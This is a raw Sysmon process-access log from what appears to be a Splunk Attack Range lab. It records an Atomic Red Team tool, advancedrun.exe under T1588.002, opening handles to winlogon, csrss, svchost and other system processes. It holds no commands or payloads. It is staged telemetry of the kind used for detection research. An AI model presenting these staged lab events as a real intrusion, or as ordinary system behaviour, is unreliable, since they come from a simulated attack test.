17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983799Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983798Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983797Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983796Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983794Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983793Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003983792Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983791Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983790Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983788Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983787Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003983786Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983785Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983784Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983783Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983782Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 